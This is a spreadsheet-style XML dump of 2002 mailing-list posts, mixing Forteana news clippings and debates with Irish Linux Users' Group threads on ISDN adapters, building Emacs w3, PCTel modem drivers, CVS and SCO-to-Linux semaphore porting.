I'd be interested in an update on the latest thinking on these things.
Particularly the 'swimming elephant' pictogram.There's a book come out recently on the world's undeciphered scripts
(including Linear A and Etruscan).
Has any list member read it?------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "Martin Adamson"  wrote:
&gt; For an alternative, and rather more factually based, rundown on 
Hamza's 
&gt; career, including his belief that all non Muslims in Yemen should 
be murdered 
&gt; outright:
&gt; 
&gt; http://memri.org/bin/articles.cgi?Page=archives&amp;Area=ia&amp;ID=IA7201And we know how unbiased MEMRI is, don't we....http://www.guardian.co.uk/elsewhere/journalist/story/0,7792,773258,00.
htmlRob
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/scripts/editorial2.cgi?cid=news&amp;aid=4816872.5ft lizard 'abandoned' at resortHolidaymakers at a seaside resort were stunned to find a 2.5ft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08705 555 999.------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/scripts/editorial2.cgi?cid=news&amp;aid=481620Close encounter of burnt kindIT came from outer space Â­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Â­ that the
odd-looking stone had been thrown at her by a child,.
But on closer inspection, she discovered all was not as it seemed Â­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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Evening Standard - 28 August 2002[Deft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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>Hi,some time now the following messages were haunting me:     automount[11593]: attempting to mount entry /home/dudeIt just came to my attention, that only freshrpm benefitting hosts showed this
up. I grepped through the binaries and found referrences to /home/dude.# grep /home/dude /usr/bin/*
Binary file /usr/bin/aaxine matches
Binary file /usr/bin/gentoo matches
Binary file /usr/bin/gphoto2 matches
Binary file /usr/bin/gtkam matches
...I am now relaxed again ;), and pass this info on. Probably Matthias Saou
himself is "dude", and some package has hardwired a path in his build
directory. It would be nice to find out which and fix it, but I am using too
many of the freshrpm suite to narrow it down.Regards, Axel.
-- 
Axel.Thimm@physik.fu-berlin.de_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/uk/2220922.stm
Big cats are on the loose in Britain and breeding their way towards record
numbers, a monitoring group has claimed. 
The British Big Cats Society said it has received more than 800 reports of
animals including pumas, black panthers, leopards and so-called Fen tigers
over the past 12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it's not, they are really out there." 'Cats with cubs' Mr Bamping said there have been reports of big cats from every corner of the
country. Big cat reports  
Hotspots include Scotland and Gloucestershire 
January 2002 - Kent man clawed by suspected Lynx 
November 2001 - farmer reports animals mauled by big cat 
April 2001 - Lynx captured in north London 
1999 - Puma-like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1976 when the Dangerous Wild Animals Act came into force, people
released their cats because they did not want to pay for a licence, put them
down, or take them to a zoo."------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/technology/2219079.stmUS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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ananova:Â  
Brazilian bees keep their own 'insect ranch'Scientists have found a new species of bee that behaves like a farmer by
keeping herds of insects.
The Amazonian Schwarzula use their own 'insect ranches' to provide food and
building materials.
The bees nest in holes in trees alongside 200 aphid-like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13:49 Wednesday 28th August 2002------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Super Blue Stuff Pain Relief - On Sale Today for $29.95 + shipping!
With Super Blue Stuff youÂ¿ll feel the results in just minutes.
Relieves arthritis pain, back pain, sore muscles, and more!
http://us.click.yahoo.com/N2sPyA/q6kEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Not fortean, but a moment in time all the same...http://news.bbc.co.uk/1/hi/entertainment/film/2220972.stm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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>Does anyone know if this is supported under 2.4.18 kernels or higher?I need to buy an ISDN TA quick, and PC World have these in stock for â‚¬65.Thanks,
	David.David Hamilton
Senior Technical Consultant
HP Ireland -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>ive just gotton myself a modem (no its not a winmodem, yes im sure) it dials
the internet grant using the RedHat PPP Dialer... and i can ping the server
i dial into but i cant get any furthur than that server? any ideas?
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Martin Adamson wrote:&gt;&gt;And we know how unbiased MEMRI is, don't we....
&gt;&gt;
&gt; 
&gt; Oh, of course, you're right, any information not coming from a source that 
&gt; fits your pre-conceived world view can simply be dismissed out of hand.
&gt; 
&gt; Martin
&gt; For goddess' sake Martin that seems to be exactly what you're doing.  You 
started your reply to Tim's posting of the Guardian article by suggesting that 
it was factually inaccurate.  Did you actually read it or did you just assume 
that if the Grauniad writes about a Muslim extremist they must be making him out 
as an all round nice guy?Stewart
-- 
Stewart Smith
Scottish Microelectronics Centre, University of Edinburgh.
http://www.ee.ed.ac.uk/~sxs/
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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&gt;What are you talking about??? That book is where all the best free porn is!!Piece of trivia: the thing is so pithy it floats!!
-- 
Fel
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">the latest -
http://news.bbc.co.uk/1/hi/world/africa/2240487.stmFriday, 6 September, 2002, 08:53 GMT 09:53 UK
Zimbabwe eases GM stanceZimbabwe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Yahoo! Groups Sponsor ---------------------~--&gt;
Looking for a more powerful website? Try GeoCities for $8.95 per month.
Register your domain name (http://your-name.com). More storage! No ads!
http://geocities.yahoo.com/ps/info
http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>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London."Was "like a frog in Cheapside" (or something similar) a catch phrase
itself, or did Mackay come up with the simile on his own?And to what event or events does it refer?I didn't find anything relevant in Partridge's *A Dictionary of Catch
Phrases.*bc
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Looking for a more powerful website? Try GeoCities for $8.95 per month.
Register your domain name (http://your-name.com). More storage! No ads!
http://geocities.yahoo.com/ps/info
http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Bill:
&gt; I've decided that I ought to put some of my writing samples on-line for
&gt; potential employers to mock. And I don't want to pay for it. There are still
&gt; a couple dozen places to do this, do any of you have preferences?
&gt;
Getting your own domain needn't be expensive, looks more professional, and
you're not going to suddenly lose your site with little or no notice (yes,
I'm still smarting from bastard Geocities). I registered mine through
http://www.easyspace.com/ - works out about a pound a week for registration
and 30Mb hosting. It's a valuable service, there's no reason not to expect
to pay.TimC------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Looking for a more powerful website? Try GeoCities for $8.95 per month.
Register your domain name (http://your-name.com). More storage! No ads!
http://geocities.yahoo.com/ps/info
http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Of course, everyone knows that Owlman is a work of fuggin` geniusJ
&gt; Hey, I met the wizard bloke from Owlman, who wants to touch me!!
&gt; 
&gt; Dave------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Times September 06, 2002
 Scissors are a snip for Third World
 From Richard Owen in Rome
 IT IS one of the unanswered questions of the past year: what happens to the
 millions of nail scissors confiscated by airport security officials from
 passengersÂ’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Â“plucked up the courageÂ”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Â“In such countries, what we think of as a
 personal grooming accessory can be a vital tool.Â” 
 The idea has been taken up at other Italian airports. 
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Zimbabwe has dropped objections to accepting genetically modified (GM) grain
&gt; so that urgently-needed food aid can be delivered, says the UN food agency.Yes, confirming what I said in my last message. Ah! I see where the problem 
lies! You seem to be labouring under the misapprehension that Zimbabwe and 
Zambia are the same country. Martin------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home for Top $
http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">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point.TimC------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Times
 September 06, 2002
 Hitler-style applicant welcomed by parties
 By Roger Boyes
 MANAGERS of GermanyÂ’s political parties are having difficulty explaining their
 enthusiastic reaction to a man who applied for membership with letters cribbed
 largely from Mein Kampf, HitlerÂ’s personal manifesto. The incident illustrates
 how indiscriminate parties have become in taking on new members during an
 election campaign, even when their sentiments bear a suspicious resemblance to
 those of the FÃ¼hrer. 
 Â“Edmund Stoiber is a thousand times more suited to leading Germany than the
 present Chancellor,Â” said one letter sent to the Christian Social Union
 headquarters in Ingolstadt. Â“Chancellor SchrÃ¶der is doing nothing to stop the
 flood of foreigners who are spreading around our Fatherland,Â” said the letter,
 signed by a certain Rudolph Lewald. 
 The CSU immediately spotted a potential member. Â“Many thanks for your nice
 thoughts,Â” replied the local party manager, who enclosed an application for
 membership. 
 The letter used chunks of HitlerÂ’s book, which is still banned in Germany.
 History students have to apply for access to the book in university libraries.
 Â“The strongest, the brave and the hardworking will receive the birthright of
 existence, only those who are born weaklings could regard this as offensive,Â”
 the letter-writer said. Â“So-called humanity is melting like snow in the March
 sun.Â” Such phrases were lifted from Mein Kampf, which was written while Hitler
 was in jail after the failed Munich putsch of 1923. 
 Similar letters, also using the Nazi leaderÂ’s words, were sent to the other
 political parties and drew sympathetic responses. Â“I read your letter with
 great interest and pleasure,Â” the manager of the Christian Democratic Union in
 Cologne, said. 
 Â“Great that you want to join us!Â”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SchrÃ¶der, the Chancellor. 
 Â“I wanted to test how serious parties are about combating right-wing
 extremism,Â” said the letter-writer, who was in fact the Cologne novelist
 Rainer Popp. Â“I had no idea that they would be so enthusiastic. 
 Â“For the first few days I expected two men in leather coats from the Special
 Branch to knock on my door. Instead only the postman called Â— with packets of
 election material from zealous political headquarters,Â” Herr Popp said. 
 Â“I was stunned that political parties could react in this way Â— I reckon I
 would have had the same response if I had signed the letter Â‘Adolf HitlerÂ’.Â”
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>Hi all,Saw this on the register this morning,
http://theregister.co.uk/content/6/26983.html, and they support ISDN dual
channel. Whoo Hoo!CW-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Quoting Waider (waider@waider.ie):&gt; Niall Sheridan wrote:
&gt; | A power cycle will do it.
&gt; | Other than that it's chipset specific.
&gt; 
&gt; sure. tried powercycling an internal modem recently? :)
&gt; 
&gt; Waider. This is Rick Moen bait.Thanks.  It was delicious.  ;-&gt;-- 
Cheers,               "That article and its poster have been cancelled." 
Rick Moen                   -- David B. O'Donnel, sysadmin for America Online
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On 0020 +0100 %{!Thu, Sep 05, 2002 at 11:53:32PM +0100}, Darragh wrote:
&gt; the help that I received today.  Then though I tried to build them.  I
&gt; started by trying the w3 program.  I used the following lines which produced
&gt; some strange results.  Would any one be able to set me straight?
&gt; 
&gt; ./configure --with-emacs --prefix=/usr/local/src/beta/w3 --exec-prefix=/usr/
&gt; local/src/beta/w3 --with-url=/url/url
One thing I _think_ you might be doing slightly wrong is your
specification of prefixes.  --prefix is the directory to be used as root
for _installing_ files.  Typically packages use /usr/local as default
(so binaries might then go in /usr/local/bin, documentation in
/usr/local/doc and so forth).
Normally, I find it sufficient to put --prefix=/usr/local, and do not
further specify things like --exec-prefix.Maybe you have a special reason for using the prefixes you chose, in
which case ignore me!
&gt; That worked fine so I moved to the next step.
&gt; make
&gt; At the bottem of the text I got the following messages:
&gt; Cannot open load file: /url/url/url-vars.el
&gt; make[1]: *** [custom-load.el] Error 255
&gt; make[1]: Leaving directory `/usr/local/src/beta/w3/lisp'
&gt; make: *** [w3] Error 2
&gt; 
&gt; When I got around to trying the url package I had no problems.  In saying
&gt; that this doesn't necessarily mean that I was doing it right so below are
&gt; the commands I used.
&gt; ./configure --with-emacs --prefix=/url/url --exec-prefix=/url/url
I'd make the same remarks about prefixes here.  I would use the command
    ./configure --with-emacs --prefix=/usr/localTo get w3 to compile, I think the with-url flag you should use is
    --with-url=/usr/local/share/emacs/site-lisp/
(Assuming you compiled/installed url with --prefix=/usr/local
Since you appear to have installed url in /url/url, configure w3 with
./configure --with-emacs --prefix=/usr/local/ --with-url=/url/url/share/emacs/site-lispA command you would have found useful would have been
    find / -name 'url-vars.el' -print
Which would have told you where the url-vars.el file was installed.A program which is very useful is checkinstall
http://asic-linux.com.mx/~izto/checkinstall/
It allows you to install packages from source while still registering
them in the package management system of your distro (rpm,deb,tgz).
Instead of "make install" type "checkinstall", and a package is put
together and installed for you.  Makes uninstallation simpler than it
might otherwise be.
-- 
Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,
Firstly I'd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straight?./configure --with-emacs --prefix=/usr/local/src/beta/w3 --exec-prefix=/usr/
local/src/beta/w3 --with-url=/url/url
That worked fine so I moved to the next step.
make
At the bottem of the text I got the following messages:
Cannot open load file: /url/url/url-vars.el
make[1]: *** [custom-load.el] Error 255
make[1]: Leaving directory `/usr/local/src/beta/w3/lisp'
make: *** [w3] Error 2When I got around to trying the url package I had no problems.  In saying
that this doesn't necessarily mean that I was doing it right so below are
the commands I used.
./configure --with-emacs --prefix=/url/url --exec-prefix=/url/url
followed by the commands make and make install.
There is no text files which contain help on installing the url package so
I'm not completely certain if I've used the right method here.Thanks againDarragh
----- Original Message -----
From: "Hunt, Bryan" 
To: ; 
Cc: 
Sent: Thursday, September 05, 2002 5:08 PM
Subject: OT: RE: [ILUG] Newby to Linux looking for information on cvs
&gt;
&gt; speaking of that IDE (weblogic developer) the open source version called
&gt; eclipse is free from eclipse.org If you are doing java development you
&gt; need to get this IDE . I've been using it for the last month and it is
&gt; absolutly superb. Best thing about it is that rather than using swing
&gt; (which is crap) is that they have their own native widget set called swt.
&gt;
&gt; When you run it on windows it uses windows widgets but when you run it on
&gt; linux it uses gtk, you should see it on gnome 2 ! Absolutely stunning !
&gt;
&gt; --B
&gt;
&gt; -----Original Message-----
&gt; From: Justin MacCarthy [mailto:macarthy@iol.ie]
&gt; Sent: 05 September 2002 16:53
&gt; To: michael.conry@ucd.ie
&gt; Cc: ilug@linux.ie
&gt; Subject: RE: [ILUG] Newby to Linux looking for information on cvs
&gt;
&gt;
&gt; This is the best step by step guide to setting up cvs on Redhat..
&gt;
&gt;
http://www7b.software.ibm.com/wsdd/library/techarticles/0205_yu/yu.html?open
&gt; &amp;l=456,t=gr
&gt;
&gt; It is for a particular IBM ide, but the setup and testing of the server is
&gt; the same for any CVS client
&gt;
&gt; Both The "Using Linux" and "Linux in a nutshell" book by Oreilly have
&gt; sections on cvs /rcs , and both books are a must buy for any linux newbie
&gt;
&gt;
&gt; Justin
&gt;
&gt;
&gt; &gt; -----Original Message-----
&gt; &gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
&gt; &gt; Michael Conry
&gt; &gt; Sent: 05 September 2002 16:34
&gt; &gt; To: Darragh
&gt; &gt; Cc: ilug@linux.ie
&gt; &gt; Subject: Re: [ILUG] Newby to Linux looking for information on cvs
&gt; &gt;
&gt; &gt;
&gt; &gt; On 0020 +0100 %{!Thu, Sep 05, 2002 at  3:55:16PM +0100}, Darragh wrote:
&gt; &gt; &gt; Hello,
&gt; &gt; &gt; I am very new to Linux and need some help on a utility called
&gt; &gt; cvs.  As far
&gt; &gt; &gt; as I'm aware its a similar protocol to FTP.  I need to use it
&gt; &gt; to download a
&gt; &gt; &gt; program from :pserver:anoncvs@subversions.gnu.org:/cvsroot/w3.
&gt; &gt; I am looking
&gt; &gt; &gt; for information on how to use it.  I'll have another look at
&gt; &gt; the man pages
&gt; &gt; &gt; but I think I have to set it up before I can download anything.
&gt; &gt; cvs is really a very different kind of thing to FTP, but the details of
&gt; &gt; that statement are left as an exercise to the reader (won't show up my
&gt; &gt; own ignorance that way ;-)
&gt; &gt; The application you want is cvsclient...
&gt; &gt; There is documentation here:
&gt; &gt; http://www.fokus.gmd.de/gnu/docs/cvs/cvsclient_toc.html
&gt; &gt;
&gt; &gt; You might get a quick idea of how it works from here:
&gt; &gt; http://www.sci.muni.cz/~mikulik/gnuplot.html
&gt; &gt; where he explains how to get cvs gnuplot...
&gt; &gt; The commands are:
&gt; &gt;
&gt; &gt; export
&gt; &gt; CVSROOT=:pserver:anonymous@cvs.gnuplot.sourceforge.net:/cvsroot/gnuplot
&gt; &gt; cvs login
&gt; &gt; cvs -z3 checkout gnuplot
&gt; &gt;
&gt; &gt; Something similar will probably do the job for you.  I'm guessing the
&gt; &gt; following MIGHT work...
&gt; &gt;
&gt; &gt; export CVSROOT=:pserver:anoncvs@subversions.gnu.org:/cvsroot/w3
&gt; &gt; cvs login
&gt; &gt; cvs -z3 checkout w3
&gt; &gt;
&gt; &gt; m
&gt; &gt; --
&gt; &gt; Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
&gt; &gt; Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
&gt; &gt;
&gt; &gt; --
&gt; &gt; Irish Linux Users' Group: ilug@linux.ie
&gt; &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
&gt; &gt; information.
&gt; &gt; List maintainer: listmaster@linux.ie
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt;
&gt;
&gt; --
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
information.
&gt; List maintainer: listmaster@linux.ie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
</t>
  </si>
  <si>
    <t>Quoting kevin lyda (kevin+dated+1031593647.e87527@ie.suberic.net):&gt; anyone here have experience with windows cvs clients accessing a cvs
&gt; server *securely*.  preferably using ssh of some form (putty or cygwin's
&gt; openssh port) and the wincvs client?Here's something I cobbled together:
http://sourceforge.net/docman/display_doc.php?docid=9026&amp;group_id=13487-- 
Cheers,           "I don't like country music, but I don't mean to denigrate
Rick Moen         those who do.  And, for the people who like country music,
rick@linuxmafia.com         denigrate means 'put down'."      -- Bob Newhart-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Hello again. I tried all the suggestions for the PCTel driver and at the end of it, everything still goes smoothly until I type "make" after I get the output from the ./configure. However, there were a couple of things I noticed along the way. After typing 
* cp configs/kernel-2.4...config .config
* make oldconfig
* make dep
The 2nd to last line I got back said that the modversions.h file was not updated. When I looked at this path to the modversions.h file, it was 281 lines and every line started with a # mark. Is it the case that nothing is read on a line after a # mark (or am I just thinking of another language?) and so should I delete the # at certain places?Also, when I was in the pctel directory and typed "make", I noticed that a different subdirectory is taken to a different modversions.h file. Inside this other file, there's nothing at all. And so I moved the modversions.h file with 281 lines to the empty modversions.h file - and got a different reply after "make". The output after I moved the file over mostly looked like this:
/usr/src/linux-2.4.18-3/linux/modversions.h:11:33: linux/modules/adb.ver: No such file or directory
/usr/src/linux-2.4.18-3/linux/modversions.h:12:37: linux/modules/af_ax25.ver: No such file or directory
/usr/src/linux-2.4.18-3/linux/modversions.h:13:36: linux/modules/af_ipx.ver: No such file or directoryThe odd lines being the path and the first half of the other lines are what's written after the # in the modversions.h file. Should there be a file at each of these (one at each of the 281 lines of the file) that I'd have to compile/make?It's taken plenty of elbow grease, but I'm glad it hasn't gone smoothly, it's a good learning experience. Again, any help is appreciated. Thanks, Eric_____________________________________________________________
email services provided by trackbike.com, your source for alleycat and trackbike photos. submissions welcome._____________________________________________________________
Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net  http://www.everyone.net/?btn=tag-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 -0700 %{!Thu, Sep 05, 2002 at  3:17:36PM -0700}, eric nichols wrote:
&gt; Hello again. I tried all the suggestions for the PCTel driver and at
&gt; the end of it, everything still goes smoothly until I type "make"
&gt; after I get the output from the ./configure. 
&gt; 
&gt; However, there were a couple of things I noticed along the way. After typing 
&gt; * cp configs/kernel-2.4...config .config
&gt; * make oldconfig
&gt; * make dep
&gt; The 2nd to last line I got back said that the modversions.h file was
&gt; not updated. When I looked at this path to the modversions.h file, it
&gt; was 281 lines and every line started with a # mark.
&gt; Is it the case
&gt; that nothing is read on a line after a # mark (or am I just thinking
&gt; of another language?) and so should I delete the # at certain places?
No that is appropriate content for the file.  I'm not a C programmer,
but I think that these sort of things (#include ) are
instructions to the compiler processed by a pre-processor in the compile
process, and include all sorts of symbols/functions
e.g. "#include " gives you maths type functions.  Since they
start with "#" they are ignored in the final compilation.Regarding the rest of the compile process, you need to tell the PCtel
software to look in the right place for the kernel headers/source. 
I recall from your previous mail that there was a flag
    --with-kernel-includes=/usr/src/linux-2.4
which could be passed to the ./configure script (with the appropriate
directory in place of /usr/src/linux-2.4).  This might allow you to
persuade the code to compile against the correct headers.  I think this
is the right way to proceed.Alternatively, maybe the steps above regarding "make dep" and so forth
should have been performed in the directory where the make process is
looking for modversions.h &amp; Co.I don't think it is a good idea keep moving files into the directory as
you describe below.  First of all you will move modversions.h (which you
have done), then you would have to move all those *.ver files, after
that, there will almost certainly be a need for further header (*.h)
files.  This could be quickly done, but is probably bad (those files
don't really belong there).For what it's worth I think you are very close to a successful
compilation.m&gt; 
&gt; Also, when I was in the pctel directory and typed "make", I noticed
&gt; that a different subdirectory is taken to a different modversions.h
&gt; file. Inside this other file, there's nothing at all. And so I moved
&gt; the modversions.h file with 281 lines to the empty modversions.h file
&gt; - and got a different reply after "make". The output after I moved the
&gt; file over mostly looked like this:
&gt; /usr/src/linux-2.4.18-3/linux/modversions.h:11:33:
&gt; linux/modules/adb.ver: No such file or directory
&gt; /usr/src/linux-2.4.18-3/linux/modversions.h:12:37:
&gt; linux/modules/af_ax25.ver: No such file or directory
&gt; /usr/src/linux-2.4.18-3/linux/modversions.h:13:36:
&gt; linux/modules/af_ipx.ver: No such file or directory
&gt; 
&gt; The odd lines being the path and the first half of the other lines are
&gt; what's written after the # in the modversions.h file. Should there be
&gt; a file at each of these (one at each of the 281 lines of the file)
&gt; that I'd have to compile/make?-- 
Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,I have a question which is a bit tricky and was
wondering of anyone has come across this problem
before or could point me in the right direction.I am involved in porting a SCO unix application to
Linux, and we have encountered a problem with the way
semaphores  are being handled. The application uses
mulitple processes to run application code with the
main process known as the bsh which controls all i/o
be it screen, or file i/o, syncronisation is handled
via semaphores.In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call.I have also noticed that if I introduce a slight delay
between changing semaphore states the problem goes
away, but this causes our entire application to run
really sloooww !! lolIs there anything weird or different with the standard
implemenation of semaphores on modern linux that could
cause a semop() to fail to pick up the change in statein a semaphore immediately?Setting sem_flg = IPC_NOWAIT and checking for errno ==
EAGAIN and recalling semop() if the semop() call fails
(-1) also fixes the problem but again system
performance goes down the toilet.both the parent controlling process run as the same
uid, and the parent creates the semaphores with
permissions 0666.Any pointers would be appreciated!Rgds,Colin Nevin __________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">take a look at http://www.pcworld.com/news/article/0,aid,102881,00.asp Andrey                            mailto:andr@sandy.ruBM&gt; Does anyone do this already? Or is this a new concept? Or has this concept
BM&gt; been discussed before and abandoned for some reasons that I don't yet know?
BM&gt; I use the physical architecture of a basic web application as an example in
BM&gt; this post, but this concept could of course be applied to most server
BM&gt; systems. It would allow for the hardware-separation of volatile and
